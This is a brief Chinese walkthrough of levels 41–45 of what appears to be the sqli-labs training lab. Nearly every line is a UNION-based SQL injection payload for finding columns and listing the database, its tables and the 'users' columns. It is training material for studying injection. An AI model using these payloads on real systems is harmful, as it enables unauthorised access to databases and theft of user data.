less-41
1.判断注入点
?id=1‘ 页面不正常 可能是整数型
2.判断闭合方式
?id=1 --+
3.查看页面回显点
?id=-1 union select 1,2,3 --+
4.查询数据库
?id=-1 union select 1,database(),3 --+
5.查询数据库的所有表
?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
6.查询users表的所有字段
?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
less-42
1.判断注入点
分别在username和password里进行查看
在username后加上单引号 页面没有报错
在password后加上单引号 页面出现报错 说明这里存在注入
2.查看页面回显点
1' union select 1,2,3 #
3.查询数据库
1' union select 1,database(),3 #
4.查询数据库的所有表
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
5.查询users表的所有字段
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #
less-43
1.判断注入点
分别在username和password里进行查看
在username后加上单引号 页面没有报错
在password后加上单引号 页面出现报错 说明这里存在注入
2.判断闭合方式
发现闭合方式为’)#
3.查看页面回显点
1') union select 1,2,3 #
4.查询数据库名
1') union select 1,database(),3 #
5.查询数据库的所有表
1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
6.查询users表的所有字段
1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #
less-44
1.判断注入点
分别在username和password里进行查看
在username后加上单引号 页面没有报错
在password后加上单引号 页面出现报错 说明这里存在注入
2.查看页面回显点
1' union select 1,2,3 #
3.查询数据库
1' union select 1,database(),3 #
4.查询数据库的所有表
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
5.查询users表的所有字段
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #
less-45
1.判断注入点
分别在username和password里进行查看
在username后加上单引号 页面没有报错
在password后加上单引号 页面出现报错 说明这里存在注入
2.判断闭合方式
发现闭合方式为’)#
3.查看页面回显点
1') union select 1,2,3 #
4.查询数据库名
1') union select 1,database(),3 #
5.查询数据库的所有表
1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
6.查询users表的所有字段
1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #